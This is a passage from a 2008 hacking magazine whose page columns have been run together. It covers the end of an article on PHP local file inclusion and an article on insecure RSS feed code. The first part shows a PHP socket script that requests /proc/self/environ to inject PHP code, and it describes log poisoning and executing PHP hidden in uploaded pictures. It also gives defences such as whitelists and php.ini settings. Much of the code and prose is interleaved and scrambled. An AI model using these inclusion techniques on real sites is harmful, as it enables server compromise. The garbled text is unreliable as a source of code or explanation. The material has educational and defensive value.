URL. It will encode our string from close it. The tool saves our comments fputs($fp, "GET /index.php.php?page=/proc/self/environ HTTP/1.1\r\n"); automatically. Now we need to upload our fputs($fp, "Referer: \r\n"); picture and there are several ways to do fputs($fp, "Host: www.example.com\r\n\r\n"); this. A lot of websites allow their members while(!feof($fp)){ $res .= fgets($fp, 128); to upload their avatars or pictures. After } we upload the picture successfully echo $res; we need to include the picture via a

URL like /index.php?page=images/ ?> phpbild.jpg and the PHP code will be executed. Listing 9. Whitelist for include statement Hybrid Attacks protection against SQL Injection attacks.

18 HAKIN9 4/2008 FILE INCLUSION ATTACKS

Commonly there are two keywords used for each process a directory with PID file _ get _ contents() function for in SQL Injection, UNION and SELECT. The (Process ID) name. You can show any log-like data files, which is not to be script detects the attack if the request information of process 7313 with ls -la executed. contains both keywords. Information about /proc/7313. Each directory contains Disable eval() function in php, that the attacker like IP address, browser, files like status, mem, and environ, eval() can run php-code from any string. referrer, request and the date will be saved which have specific information about Don't give too much freedom to your in attacks.txt and the attacker will be the process. The file environ contains scripts which uses require|include*() redirected. What has SQL Injection to do the environment of the process. The functions. Use absolute paths and make with LFI? What would happen if we simulate file /proc/self is something like a link. A your string safer before you include it. Don't an SQL Injection attack with PHP codes? process can access his own information, let raw or encoded version of characters

The request would be saved in attacks.txt without knowing his own PID. We can like '..' or '/' in your to-be-included- and if we include the file via URL, the PHP open via URL /proc/self/environ like / string. code would be executed. The attacker index.php?page=/proc/self/environ Bad inclusion : could send a request like: to show PHP environment variables. They

look like this: see Listing 7. include(“$any_path_and_file”); www.example.com/index.php?id= UNION I have opened the file with Firefox SELECT and my HTTP _ USER _ AGENT has been Good inclusion: detected successfully and shown.

The script thinks it is a SQL Injection We can change the HTTP _ USER _ include(“/absolute/path/for/inclusion/ attack, because the request contains AGENT, HTTP _ REFERER by requesting a $checked_string_with_just_allowed_ both keywords UNION and SELECT. All page with a PHP script. What would happen chars”); information about the attacker will be if we would send a PHP code instead of the saved in the attacks.txt. If you open the file browser name or referer? The PHP code If php.ini is editable, some preferences via URL like www.example.com/attacks.txt it would be executed and showed. We can will need to be set to protect against looks like this: see Listing 5. send with script in Listing 8 PHP codes FI-attacks. Setting allow _ url _ fopen An attacker needs to include attacks.txt instead of referrer. = off, can protect us against RFI via URL like www.example.com/index.php?p If the PHP configuration page is attacks. Scripts which use functions like age=attacks.txt to run his commands. displayed, then this attack was successful. file _ get _ contents() will not work correctly. If using PHP 5.2.0 or higher, the

PHP Code in /proc Protecting against File setting allow _ url _ fopen = on, but /proc is a virtual file system for Linux that Inclusion Attacks allow _ url _ include = off. In the allows communication between the kernel We saw how to find File Inclusion standard configuration allow _ url _ and the user. The files in /proc do not vulnerabilities and how to exploit them. Now include, should be off. We should also exist on the hard drive they are in RAM. we will see how to protect against them. First set register _ globals = off, so an The user can change some information the file should be checked against a white attacker can not modify the variable $page about processes on the fly and influence list so only those files can be accessed, via URL. Displaying errors in PHP is not programs. /proc is not really a file system, which means, it is not possible to include recommended, because it shows a lot of but a user can move in it like other files like /etc/passwd (see Listing 9). information about the system and website. file systems in Linux. User can run the Use file _ get _ contents() instead You can set it off with display _ errors command ls -la /proc to list the content of include() for logs, etc. The file _ = off. of the proc directory (Listing 6). get _ contents() function just reads the The golden rule is always: safe coding! The numeric directories are running content of file without execution even if processes in the system. Linux creates a .php file is requested. Its safer to use Erhan Yekta Erhan Yekta is a german-kurdish author, who has been working in the IT-Industry for ten years now. He is, On the 'Net and has been developing professional solutions with PHP/MySQL for web applications like product- and web- • http://www.php.net search engines, crawler etc. His areas of expertise are developing and upgrading CMS as well as web server • http://httpd.apache.org/ administration.He is currently working on freelance on the • http://www.owasp.org/ development of the product-search engine Shophexe.You • http://google.com/codesearch can contact him under the following e-mail address: [email protected] • http://www.sitepoint.com/blogs/2006/10/06/oh-dear/ • http://www.jpeg.org Ali Recai Yekta • http://exif.org/ Ali Recai Yekta is 23 years old. He has been working with • http://www.sentex.ca/~mwandel/jhead/ computers for ten years, five of them with computer and web application security. He is a system administrator • http://wildmary.net-sauvage.com/share/yap1.1.zip of a webserver and performs penetration tests. He is • http://www.phpnuke.org/ studying computer science in Germany. You can contact him under http://ww.alirecaiyekta.com

4/2008 HAKIN9 19 ATTACK ADITYA K. SOOD Hacking RSS Feeds: Insecurities in Implementing RSS Feeds

Difficulty This paper sheds light on the insecure coding practices that affect RSS based web applications and also on their flexibility. The advent of Web 2.0 has enhanced the mobility of content. The inclusion of content has become the sole basis for the inter- working of websites.

SS feeds are used extensively. This • Guidelines should be provided which are to be serves as an interdependent working followed by the scraper. R platform. But during penetration testing • Simply block the IP Address at the interface sessions, PHP based RSS applications show level. vulnerable behavior due to insecure coding. • Develop Feeds manually with constraints. As a result of this, web application robustness is affected. This layout is versatile from a Working of an security point of view as well as from a working RSS Enabled Application structure of applications. This paper discusses The working paradigm starts from a well designed the infection vectors that occur due to insecure Content Management System. It is considered coding by developers and includes other related to be the root of feed transference and the security issues. It will provide a detailed analysis operations required in managing data flow of the errors and efficient measures to correct between various websites. The generation and those errors, while keeping in mind the original transference of feeds is based on the application security concerns. coding used for web services. PHP is extensively used for creating the feeds structure. The model Cyber Law shows the inclusion of feeds from different Perspective on this Issue websites and their processing by the service WHAT YOU WILL RSS Feeds follow the Copyright procedure and programs. Now let’s look at the general structure LEARN... the implications covered in it. The major point of Content Management and Syndication: see Peripheral knowledge of working of discussion is Site Scraping. It is a process of Figure 1. of RSS feeds will be useful. scraping the contents of another website into a The user is one of the components of Developers must know RSS different format. The US laws have rightly stated this management system because the major implementation in PHP and ASP that linking to another website is not a breach of interaction is undertaken with the user. The WHAT YOU SHOULD the Copyright Act. It becomes an issue whenever content management system always produces KNOW... the site owner wants you to stop scraping and it is HTML and RSS Feeds. The language used is The insecure elements in RSS still continued in an illegal way. The best approach XML which is based on a standard specification. implementation which results in to follow is Licensed Feeds. More precisely XSLT is used for transformation Web Exploitation The best practices are: of content into feeds. The feeds can be Developmental problems in implementing RSS directly converted into HTML pages based on • The scraper should follow the robots.txt the designed application. As a result of this Security impacts due to RSS Flaws directives. operation, a direct interface is provided to a user.

20 HAKIN9 4/2008 HACKING RSS FEEDS

The RSS configurations provide large quantities of information as feed elements Listing 1. Simple Parsing Library to remote sites for de-centralizing use LWP::Simple; information. There are a number of use XML::Simple; RSS variants present with different specifications. The base structure works my $url=$ARGV[0]; on the specification used as a benchmark # Retrieve the feed, or die gracefully for designing elemental objects. The prime my $feed_to_parse = get ($url) or die "I can't get the feed you want"; mechanism is the same for any kind of RSS implementation. # Parse the XML To understand security implications it is my $parser = XML::Simple->new( ); my $rss = $parser->XMLin("$feed_to_parse"); crucial to comprehend the parsing of RSS feeds. The feeds are parsed through three # Decide on name for outputfile basic techniques which are enumerated my $outputfile = "$rss->{'channel'}->{'title'}.html"; below. # Replace any spaces within the title with an underscore $outputfile =~ s/ /_/g; XML Parsing This is a process of parsing the raw feeds # Open the output file open (OUTPUTFILE, ">$outputfile"); into well structured RSS feeds to be used directly in website content and blog feeds. # Print the Channel Title For detailed lookup, let’s see a short PERL print OUTPUTFILE '

'."\n".'{'channel'}->{'link'}".'">'; code for practical implementation of XML print OUTPUTFILE "$rss->{'channel'}->{'title'}\n

\n"; parsers. It is implemented through the XML: :Simple parsing library. See Listing 1. # Print the channel items print OUTPUTFILE '

'."\n"."

{'link'}"; can be directly applied throughout the print OUTPUTFILE '">'; program. No doubt the implementing of print OUTPUTFILE "$item->{'title'}
{'link'}"; print OUTPUTFILE '">'; print OUTPUTFILE "$item->{'title'}

\n"; as such for RSS feeds. It’s basically # Close the OUTPUTFILE a reproduction process for arranging close (OUTPUTFILE); metadata by reducing the complexities in Listing 2. Code Snipped relationship between the different objects used. Let’s look at the transformation # Feed's title and link mechanism between XML/XSLT: see Figure my($f_title, $f_link) = ($rss =~ m#(.*?).*?(.*?)#ms); 2. # RSS items' title, link, and description These components are well placed in the above presented hierarchical model of while ( $rss =~ m{.*?(?:(.*?).*?)?(?:(.*?). RSS generation. Let’s look at a very simple *?)?(?:(.*?).*?)?}mgis ) { my($i_title, $i_link, $i_desc, $i_fn) = ($1||'', $2||'', $3||'', undef); RSS field with one item: see Listing 3.

Basically the feeds structure is based # Unescape & < > to produce useful HTML on the following: my %unescape = ('<'=>'<', '>'=>'>', '&'=>'&', '"'=>'"'); my $unescape_re = join '|' => keys %unescape; $i_title && $i_title =~ s/($unescape_re)/$unescape{$1}/g; • Channel (title, description, URL, creation $i_desc && $i_desc =~ s/($unescape_re)/$unescape{$1}/g; date, etc.)

4/2008 HAKIN9 21 ATTACK

• Image • Item (title, description, URL, etc.) This structure is converted into a well • Item (title, description, URL, etc.) • Item (title, description, URL, etc.) defined object component that can then be easily placed into HTML pages or other web services for reproduction of data �� in an efficient manner. This discussion �� provides a brief overview of RSS functioning. As our discussion is geared more towards application flaws, we will �� now look into various insecure practices one by one.

RSS Attack Vectors – Developmental Insecurities Now we will discuss various attack vectors and insecure coding practices used by developers by analyzing a number of �� stringent errors.

Failure in Calling �� DOM Based Functions Below is one of the function-related specific errors in the RSS based applications.

The call to domxml _ new _ doc() fails as a result of which an application is unable to create a new document object. �� The function domxml _ new _ doc() is a modified version of domxml _ new _ Figure 1. RSS Working Layout xmldoc().

Fatal error: Call to undefined function domxml_new_doc() in /home/.bauzeur/ �� thecabin/podcast/rss.php on line 41

This specific function is mainly used in PHP5. There are a number of problems that arise from migration from PHP4 to PHP5. The applications’ functionality depends on the software versions too. The function creates a new empty XML document and returns an instance of it. The XML number �� version of the document is passed as �� an argument. The function prototype is structured as:

�� DomDocument domxml_new_doc (string $version)

The XML documents are used to �� transfer data in XML format which are �� further rendered by the browser for better presentation to the user. The background working of RSS is based �� on the generation and handling of XML documents that possess data. The function is called from the GNOME XML Figure 2. RSS Content Syndication – Transformation library. The calling mechanism uses

22 HAKIN9 4/2008 4/2008 HAKIN9 23 ATTACK

php _ xmldom.dll. The DLL provides parser consume the CPU time and dynamic loading of a number of functions memory extensively thereby resulting defined in it. It is configured by specifying in a potential Denial of service. Many it as an entry in the php.ini file. The developers or system controllers enable function prototype should be defined as: DTD which is considered to be a security see Listing 4. risk. Even base software disables DTD’s The code is symmetrical and is by default. Another point that comes used as a definitive code structure. The into play is whether to accept DTD from developers should focus on the calling other resources or not. For security, the method and the migration of content sources have to be trusted. Any DTD between different web pages. The kind from an untrusted source generates of PHP version to be used with XML vulnerable behavior. The XPATH problems document creation also impacts the can be encountered if the code is robustness of the web application. Of designed to call remote objects from course secure coding is very important. an untrusted source. The developers It affects the security of an application should concentrate on this factor too. Wrong definitions of DTD’s can be because, again, it results in potential a problem because a badly crafted or denial of service with the inclusion of malicious XML document makes the complex queries by the malicious user.

Listing 3. Code Snippet for Transforming into XHTML Fragments

RSS2.0 Flaws http://www.exampleurl.com/example/index.html This is an example RSS 2.0 feed Flaws en-gb

Example: Code Snippet for transforming into XHTML fragments

22 HAKIN9 4/2008 4/2008 HAKIN9 23 ATTACK HACKING RSS FEEDS

This in turn affects the robustness of the Listing 4. Function Prototype web application and the transference mechanism slows down. define('DOMXML_LOAD_PARSING',0); These specific security issues can be define('DOMXML_LOAD_VALIDATING',1); define('DOMXML_LOAD_RECOVERING',2); the result of error prone XML base. define('DOMXML_LOAD_SUBSTITUTE_ENTITIES',4); define('DOMXML_LOAD_DONT_KEEP_BLANKS',16); Header Modification Checks The rss.php web pages are prone to [PHP5] – function domxml_new_doc($version) {return new php4DOMDocument();} [PHP4] – function domxml_new_xmldoc($version) {return new php4DOMDocument();} header based errors. The web page is divided into two parts, the header So the code would be stated as: and the body. It depends a lot on the

$dom = new DOMDocument('1.0'); type of content to be transferred and taken in response. The testing process // create and append the root element, is termed as HTTP Response Splitting $rss = $dom->appendChild($dom-> createElement('rss')); By default the content type is set to // create and append to $rss text/html. Since the process is part of $error_check = $rss->appendChild($dom-> createElement('error_check')); the header specification, it is crucial

// set the text node for $error_check to modify headers based on the $error_check->appendChild($dom-> createTextNode('PHP DONE')); application requirements. The RSS based applications require XML as content type. // print DOM document as XML The XML based document structure is echo $dom->saveXML(); used for data transference. Let’s see:

The other way can be: Generally, the headers are sent as:

$dom = new DOMDocument('1.0'); // create and append the root element, Date: Mon, 10 Jul 2007 15:51:59 GMT $rss = $dom->appendChild ($dom-> createElement ('rss')); Server: Apache/2.2.0 (Unix) mod_ssl/ 2.2.0 OpenSSL/0.9.5g // create and append to $rss Content-Encoding: gzip $rss->appendChild ($dom-> createElement ('title')); Content-Type: text/html // set the text node for $title $error_check ->appendChild ($dom-> createTextNode ('PHP DONE!')); This is a general view. For XML data, the headers have to be manipulated to a // print DOM document as XML different content type as presented below: $dom->formatOutput = true; echo $dom->saveXML();Listing 5. Vulnerable Application Trigging a Script Date: Mon, 10 Jul 2007 16:55:59 GMT Server: Apache/2.2.0 (Unix) mod_ssl/ <div id="header"> 2.2.0 OpenSSL/0.9.7g <div id="headerimg"> Content-Encoding: gzip <div class="header_container"> Content-Type: text/html + xml <h1><a href="<?php echo get_settings('home'); ?>/"><?php bloginfo('name'); ?></a></h1> <div class="description"><?php bloginfo('description'); ?></div> This is an actual view. The developers </div> design robust and dynamic RSS based </div> web applications. Code writers design the </div> code with certain standards. For example, Listing 6. Structural Code the headers have to be specified on the basis of the output to be produced. <?php $rss = array("element_a", "element_b", "element_c"); [php] reset($rss); Warning: Cannot modify header while (list(, $value) = each($rss)) { information – headers already sent by echo "Value: $value \n"; (output started at /home.10.19/www/ } blog/rss.php:2) in /home.10.19/www/ blog/rss.php on line 2 foreach ($rss as $value) { echo "Value: $value \n" } ?> The PHP itself is an intelligent element and can perform certain work itself, without 24 HAKIN9 4/2008 4/2008 HAKIN9 25 HACKING RSS FEEDS any intervention by the user. The problem coding. Calling of structures in a wrong • The iteration of objects that are occurs when some of the body is sent to manner generates an error. The main undertaken practically by using control the user. A request to change the header problem is the passing of arguments. The structures. is made. Since the error is a result of the basic problem which occurs with these header statement, the developer should types of errors is: The error presented below is the look for adjacent code near the header() consequence of failure of arguments function. The basic flaw is in the use of • The calling of variables not initialized in in foreach() control structure. The the header function. The second cause the context of code. developers design an error prone code can result from redirection of pages. The • The calling of variables with different mostly while using this control structure. underlined code redirects the user to the data types that are not defined. It basically works on arrays. When this destination i.e. index.phpListing 7. Usage of Arrays – Example <? header('Location: /index.php'); ?> function base_debug_getHash($method_name, $params, $app_data) { So a simple code error affects the $key1 = '786'. chr(0x00); robustness of an application. As RSS $key2 = '645'. chr(0x00); based applications require continuous $result = array( functionality to update the site summary $key1 => 'key1 is a ‘. gettype($key1), database remotely, the above defined $key2 => 'key2 is a ‘. gettype($key2), two problems should be checked in ); $result; rss.php (scripts in PHP to implement return } RSS automation, See Appendix) to avoid xmlrpc_server_register_method($xmlrpc_server, 'base_debug.getHash', errors. This is considered one of the 'base_debug_getHash'); major potential risks in web application Listing 8. Generating Feeds security. The attacker can easily exploit the XML parsing failed: syntax error (Line: 2, Character: 0) insecure web application by passing a Reparse document as HTML Error:unexpected start-tag (root element already specified) simple PHP script in which headers are modified directly. For Example, a vulnerable Specification:http://www.w3.org/TR/REC-xml/ application can trigger a script as provided 1: Listing 5. 2: Warning: filesize() [<a href='function.filesize'>function.filesize</a>]: Stat failed for /usr/local/webs/php-data/rss.xml (errno=2 – No It changes the execution flow of the web such file or directory) in /usr/local/webs/htdocs/rss.php application. In these types of attacks, the on line 12 user is redirected towards the destination 3: object which is passed as an argument to 4: Warning: fopen() [<a href='function.fopen'>function.fopen</a>]: Unable to the header function. This attack basically access /usr/local/webs/php-data/rss.xml in /usr/local/webs/ occurs at the backend. It further acts htdocs/rss.php on line 15 as a base for third party redirection 5: attacks, phishing and cross site request Listing 9. Error Code Encountered in rss.php forgery attacks. An attacker can specify the destination URL with arguments and Fatal error: Uncaught exception 'ADODB_Exception' with message 'mysql error: [1048: pass it to the web application by a simple Column 'iUserID' cannot be null] in EXECUTE("INSERT INTO CBS_statistics (dtCreated,iUserID,iPodcastID,sCategory) inclusion mechanism. Once the script VALUES (NOW(),NULL,'32','PODCAST RSS')") ' in /home/cbsnewsr/ is injected and executed the vulnerable public_html/lib/core/External/ADODB/adodb-exceptions.inc.php: application is exploited according to the 78 Stack trace: #0 /home/news/public_html/lib/core/External/ ADODB/adodb.inc.php(886): adodb_throw('mysql', 'EXECUTE', 1048, attacker’s request. Therefore, it should be 'Column 'iUserID...', 'INSERT INTO CBS...', false, Object(ADODB_ taken into account that security should mysql)) #1 /home/cbsnewsr/public_html/lib/core/External/ADODB/ be implemented through secure code adodb.inc.php(842): designing. ADOConnection->_Execute('INSERT INTO CBS...') #2 /home/cbsnewsr/public_html/lib/core/ Invalid Argument Objects/class.GenericObject.php(397): Checks in Control Structures The errors based on calling control ADOConnection->Execute('INSERT INTO CBS...', Array) #3 /home/cbsnewsr/public_html/ rss.php(10): GenericObject->Save() #4 {main} thrown in / structures are quite common. The RSS home/cbsnewsr/public_html/lib/core/External/ADODB/adodb- based web applications are prone to these exceptions.inc.php on line 78 types of errors. Usually the base is PHP 24 HAKIN9 4/2008 4/2008 HAKIN9 25 ATTACK HACKING RSS FEEDS structure is used with different objects The pointers used for array traversing in without checking the arguments used for foreach() structures reset automatically. iteration of objects, errors occur. Let’s have a look at the structural code: see Listing 6.Warning : Invalid argument supplied The foreach() structure is called in this for foreach() in /var/www/gallery/ manner. Developers generally prefer to use rss.php pn line 126 the reset() function. Even if this function Warning : Cannot modify header is not used the reset is performed by the information – headers already sent by foreach() structure itself. One problem (output started at /var/www/gallery/ arises when coders do not use unset() Figure 3. XML Marker rss.php 126) function to flush the array object at the end. The main problem of error generation is caused by the arguments passed to Listing 10. Error Logging Mechanism the structure. In order to circumvent these <?php errors, developers should define the $b_debugmode = 1; // 0 || 1 [Boolean Check] variables carefully. The usage of arrays should be done according to the application $administrator_mail = 'developer@company.com'; requirement. For Example: see Listing 7. $administrator_response_mail = 'info@mywebsite.com'; If the keys are not declared with null character appended at the end, it will result function db_query( $query ){ in a bug. It affects the generation of XML global $b_debugmode; format. So these types of developmental // Perform Query errors should be avoided. $result = mysql_query($query); The security impact is high as it // Check result provides the working flow of various // This shows the actual query sent to MySQL, and the error. Useful for debugging. structures that are used in web if (!$result) { applications. It also provides information on the vulnerable function and the type if($b_debugmode){ of arguments passed. The attacker $message = 'Invalid query: ' . mysql_error() . ' '; can use a trial and error mechanism to check the robustness of the function. $message .= 'Whole query: ' . $query . ' '; die($message); The vulnerable function can be checked } against buffer overflows. It depends on the type of arguments and initialized variables. raise_error('db_query_error: ' . $message); } Due to this factor, the security of web return $result; } applications is impeded. An attacker can simultaneously design a function on the function raise_error( $message ){ same pattern as the vulnerable function global $administrator_mail, $administrator_response_mail; to test the insecure vectors. A simple $serror= vulnerable function not only lowers the "Env: " . $_SERVER['SERVER_NAME'] . "\r\n" . effectiveness of an application but also "timestamp: " . Date('m/d/Y H:i:s') . "\r\n" . the security parameters. Furthermore, "script: " . $_SERVER['PHP_SELF'] . "\r\n" . the function can be used to leverage "error: " . $message ."\r\n\r\n"; information extensively. // open a log file and write error XML Parsing Errors $fhandle = fopen( '/logs/errors'.date('Ymd').'.txt', 'a' ); if($fhandle){ Parsing errors are quite common in RSS based web applications. Usually fwrite( $fhandle, $serror ); XML based documents work on the fclose(( $fhandle )); root element specification. The working } of elements and the benchmarks are // e-mail error to system operator provided by the W3C. The validation if(!$b_debugmode) and specification is checked against mail($administrator_mail, 'error: '.$message, $serror, 'From: ' . $administrator_ the standards directly from the W3C response_mail ) } ?> website. It defines the usage of elements in a hierarchical way from the root to 26 HAKIN9 4/2008 4/2008 HAKIN9 27 ATTACK HACKING RSS FEEDS the nodes. This type of error is basically So XML marking should be done in a to use XML Markers for checking XML tag a starting tag problem. The developers correct manner to avoid errors. The depth attributes. See Figure 3. sometimes use special characters in the of XML hierarchy can be extracted from tags that cause parsing problems. The the information resulted out. This not only Database Insecure basic issue is that feeds are generated shows the type of objects used but also Coding Checks: SQL Injection Base in a specific pattern already designed. If the interdependencies and working usage Most of the applications designed for a certain code is prone to an error in the of each object. It has been noticed in many dynamic working in PHP have a database beginning, the feeds are not generated web application configurations that the present in the backend. The database in the right manner thereby affecting limit value for the XML hierarchy is low. For application has structured queries the functionality of the RSS application Example: The XML parsing vulnerabilities that are called by the user through the extensively. See Listing 8. stated as: interface provided. The web three tier Another reason for errors can be http://publib.boulder.ibm.com/ architecture works on this platform. A the mismatched version of the tags. infocenter/wasinfo/v4r0/index.jsp?topic=/ user simply provides input if required, Sometimes a developer forgets to use com.ibm.support.was40.doc/html/Security/ or else the backend operations are the end tags which are imperative for the swg24003729.html executed automatically to get the work completion of an element. For the start The impact of this action results done. tag specification, the benchmark is stated in denial of service internally because The selection of variables and setting here: http://www.w3.org/TR/REC-xml/#sec- elements will not be allocated after limit. of parameters play a crucial role in the starttags In order to avoid this, the limit should robust functionality of RSS based web These types of errors can be reduced be not be defined. The document has applications. Let’s have a look at the error to some extent by using XML Marker to be made dynamic for any number of code encountered in rss.php of some Editors. object allocations. A better approach is websites. See Listing 9.Listing 11. Error Due to a Path Problem in rss.phpWarning: main(../../../includes/head_help.php): failed to open stream: No such file or directory in /vol/2/htdocs/blastmob/mobile/help/ gen/rss.php on line 11Warning: main(): Failed opening '../../../includes/head_help.php' for inclusion (include_path='.:/usr/local/netomat/php/lib/php') in /vol/2/htdocs/blastmob/mobile/help/gen/rss.php on line 11Warning: main(../../../includes/vars..php): failed to open stream: No such file or directory in /vol/htdocs/blastmob/mobile/help/gen/ rss.php on line 11Warning: main(): Failed opening '../../../includes/vars..php' for inclusion (include_path='.:/usr/local/netomat/php/lib/php') in /vol/ 2/htdocs/blastmob/mobile/help/gen/rss.php on line 11Warning: main(../../../includes/bodyStart_dynamic.php): failed to open stream: No such file or directory in /vol/2/htdocs/blastmob/ mobile/help/gen/rss.php on line 16Warning: main(): Failed opening '../../../includes/bodyStart_dynamic.php' for inclusion (include_path='.:/usr/local/netomat/php/lib/ php') in /vol/2/htdocs/blastmob/mobile/help/gen/rss.php on line 16Warning: main(../../../includes/topNav.php): failed to open stream: No such file or directory in /vol/2/htdocs/blastmob/mobile/help/ gen/rss.php on line 17Warning: main(): Failed opening '../../../includes/topNav.php' for inclusion (include_path='.:/usr/local/netomat/php/lib/php') in /vol/2/htdocs/blastmob/mobile/help/gen/rss.php on line 17Warning: main(../../../includes/header.php): failed to open stream: No such file or directory in /vol/2/htdocs/blastmob/mobile/help/ gen/rss.php on line 18Warning: main(): Failed opening '../../../includes/header.php' for inclusion (include_path='.:/usr/local/netomat/php/lib/php') in /vol/2/htdocs/blastmob/mobile/help/gen/rss.php on line 18 RSSListing 12. Error Prone OutputWarning: main(/home.10/paxatago/www//inc/prepend.php) [function.main]: failed to open stream: No such file or directory in /home.10/ www/rss.php on line 34Fatal error: main() [function.require]: Failed opening required '/home.10/www//inc/prepend.php' (include_path='.:/usr/local/lib/php') in /home.10/www/rss.php on line 3426 HAKIN9 4/2008 4/2008 HAKIN9 27 ATTACK HACKING RSS FEEDSListing 13. Appendix A: Conversion Script<?php $line=str_replace("®", " ", $line); include "./rss_export.php"; $line=str_replace("™", " ", $line); $rss_feed="http://www.rssflaws.net/flaws.xml"; $line=str_replace("€", "?", $line); $template="sample-template.rat"; $line=str_replace("„", " ", $line); $DateFormat="d M y, h:m:s"; $line=str_replace("“", " ", $line); if (isset($_REQUEST["RSSFILE"])) { $rss_feed = $_REQUEST["RSSFILE"]; $line=str_replace("§", " ", $line); } $line=str_replace("&", "&", $line); if (isset($_REQUEST["TEMPLATE"])) { $line=str_replace("—", " ", $line); $template = $_REQUEST["TEMPLATE"]; $line=str_replace("'", "'", $line); } if ($rs['image_url'] != '') { $FeedMaxItems = 5000; if (isset($_REQUEST["MAXITEMS"])) { $line=str_replace("%ImageItem%", "<a href=\"$rs[image_ $FeedMaxItems = $_REQUEST["MAXITEMS"]; link]\"></ $RandomItems=0; a>\n", $line); if (isset($_REQUEST["RANDOM"])) { } $RandomItems = $_REQUEST["RANDOM"]; else { $line=str_replace("%ImageItem%", "", $line); } } $count = $count+1; error_reporting(E_ERROR); if (strstr($line,"%BeginItemsRecord%")){ $from = $count; } $rss = new RSS_export; if ($from == -1){ echo $line;} } $linecount = 0; $rss->cache_dir = './temp'; foreach($rs['items'] as $item) { $rss->cache_time = 1200; if ($RandomItems == 1) { $from = 1; $seeder = hexdec(substr(md5(microtime()), -8)) & $rss->date_format = $DateFormat; 0x7fffffff; if ($rs = $rss->get($rss_feed)) mt_srand($seeder); { $c=mt_rand(0,1); $theData = file($template); if ($c == 0) { $count = 0; $seeder = hexdec(substr(md5(microtime()), -8)) & $from = -1; 0x7fffffff; foreach($theData as $line) mt_srand($seeder); continue; } } { if ($linecount == $FeedMaxItems) { if ((strstr($line,"NOCRLF=")) || (strstr($line,"NAME=")) || break; (strstr($line,"FILEEXT=")) || } (strstr($line,"DATEFORMAT=")) || (strstr($line,"TIMEFORMAT="))) { ++$linecount; $line=""; } $strcount=0; $line=str_replace("%Copyright%", "$rs[copyright]\n", foreach($theData as $line){ $line); $strcount=$strcount+1; $line=str_replace("%Copyright%", "", $line); if ($strcount>=$from){ $line=str_replace("%Language%", "$rs[language]\n", $line=str_replace("%BeginItemsRecord%", "", $line); $line); $line=str_replace("%ItemTitle%", $item['title'], $line=str_replace("%Language%", "", $line); $line); $line=str_replace("%Editor%", "$rs[managingEditor]\n", $line=str_replace("%ItemLink%", $item['link'], $line); $line); $line=str_replace("%Editor%", "", $line); $line=str_replace("%ItemDescription%",$item['descrip $line=str_replace("%Webmaster%", "$rs[webMaster]\n", tion'], $line); $line); $line=str_replace("%ItemPubTime%", $item['pubDate'], $line=str_replace("%Webmaster%", "", $line); $line); $line=str_replace("%FeedPubTime%", "$rs[lastBuildDate]\ $line=str_replace("%ItemPubTime%", "", $line); n", $line); $line=str_replace("%EndItemsRecord%", "", $line); $line=str_replace("%FeedPubTime%", "", $line); $line=str_replace("<", "<", $line); $line=str_replace("%Rating%", "$rs[rating]\n", $line); $line=str_replace(">", ">", $line); $line=str_replace("%Rating%", "", $line); $line=str_replace(" ", " ", $line); $line=str_replace("%Docs%", "$rs[docs]\n", $line); $line=str_replace(""", " ", $line); $line=str_replace("%Docs%", "", $line); $line=str_replace("©", " ", $line); $line=str_replace("€", "?", $line); $line=str_replace("%FeedTitle%", "$rs[title]\n", $line); $line=str_replace("„", " ", $line); // $line=str_replace("%FeedLink%", "<a href=\ $line=str_replace("&", "&", $line); "$rs[link]\">$rs[title]</a>\n", $line); $line=str_replace("'", "'", $line) echo $line; $line=str_replace("%FeedLink%", "$rs[link]\n", $line); } } } } $line=str_replace("%FeedDescription%", else { $rs[description], $line); echo "Error: An error occured while parsing RSS file. Please contact with us at: $line=str_replace("<", "<", $line); support@extralabs.net\n"; } $line=str_replace(">", ">", $line); ?> $line=str_replace(" ", " ", $line);28 HAKIN9 4/2008 4/2008 HAKIN9 29 ATTACK HACKING RSS FEEDSThe above example is a direct with a running application is breached, it show web server objects in light of outcome of bad coding. The error is becomes easy to perform data mining for their security relevance. Generically, the not due to the result of the functions or extracting more information. It acts as an directory structure on the web server can arguments passed. The query that is evolving chain process (chain reaction?) be understood. The path environment structured to configure the database is and web applications can be exploited object shows internal information in not initialized generically. The declaration through database injections. This in turn the web directory and the way objects is not done effectively. The iUserID supports the theme of a vulnerability are organized. It is inevitable that error parameter is getting NULL causing the finding. A simple error in RSS database generation leads to information leakage. web application to show an exception results in a full compromise. The information can be exploited by during run time. The trace of a generated a malicious user to dig deeper into a error is presented as such. The parameter Path Configuration Checks – web application and to learn the type is defined as iUserID. so it must be unique Missing Files or Directories of system objects participating in that and cannot be null if no exception code The configuration of files is a critical interaction. The path disclosure is one is set. The developer has not designed aspect as it influences the overall of the main problems because it shows an exception code to handle errors when functionality of the software. After looking the hierarchy of the directory in which ID is NULL. So it becomes a problem of at a number of error prone rss.php files reside. It is further used for directory coding again. These types of errors make pages, it has been found that the path of traversal attacks if any misconfiguration is the database unrecoverable if a proper important files is not configured properly. present in the application software. backup is not made. Cross references The applications explicitly written for RSS defined for database optimization are the checks require a number of extra files Conclusion major cause of this happening. A single that support the run time execution. So This paper elucidates a number of unstructured error can dismantle the those files have to be included in the developmental problems that affect the proper functioning of the database. The code with definitive parameters. The PHP robustness of Really Simple Syndication, problem can be reduced by setting debug compiler requires proper paths where i.e., RSS based web applications. Most code or exception handlers for tracing the libraries are located. This problem of these applications are written in PHP errors in RSS based web applications. occurs mainly during installation when with simulation of XML. The major point Another point which should be taken into developers change the base directory discussed is insecure vectors of coding account while tracing errors is that the and do not alter the core configuration and the problematic concerns they create. error information should not be displayed files with respect to it. The problem is an The code has to be verified both offline to the end user. There should be an error intrinsic one but the errors are generated and online to prevent lapses. Continuous, logging mechanism. Web administrators at the application level thereby preventing persistent errors will result in vulnerabilities. and developers should emphasize the the interface from working. The cause Secure coding is the key solution to these importance of this factor. See Listing 10. of this type of problem is mismatch in problems. The emphasis is to implement So this type of practice can avert the the usage of extensions. The developers security in hard core applications coding problems in web based database use certain extra functions which are applications to some extent. not present in the normal extensions by Note: It affects the security element a lot. default. It means the extensions have to The underlined code gives you an idea The leaking of database information acts be included externally and the path has of the conversion mechanism used to as a basis for severe SQL injections. The to be specified in the configuration file. If transport and export RSS feeds. The ASP attacker can easily extract the pattern of this is not done effectively the application and PHP code is presented. It is very queries that are executed in the database. shows undesired behavior crucial from the security point of view It not only provides the query information Let’s have a look at the error due to a to actualize the source code for better but also the objects and arguments to be path problem in rss.php. See Listing 11. understanding and testing of applications. supplied. The attacker can easily build new Another Error Prone Output: see Listing queries on the same pattern with different 12. Aditya K. Sood arguments to test the robustness of the The above presented errors clearly Aditya 